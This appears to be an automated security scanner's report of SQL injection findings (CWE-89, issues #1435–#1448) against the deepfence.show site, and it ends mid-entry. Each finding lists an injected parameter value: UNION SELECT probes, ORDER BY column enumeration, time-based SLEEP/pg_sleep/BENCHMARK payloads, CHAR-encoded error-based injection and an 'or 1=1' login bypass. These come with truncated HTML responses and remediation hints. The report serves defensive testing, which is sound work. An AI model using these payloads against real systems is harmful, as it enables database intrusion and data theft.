ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1435\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1436\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1437\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \"^\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1438\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1439\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1440\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1441\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1442\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1443\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1444\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or \"1\"=\"1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1445\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AnD SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1446\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1447\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1448\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 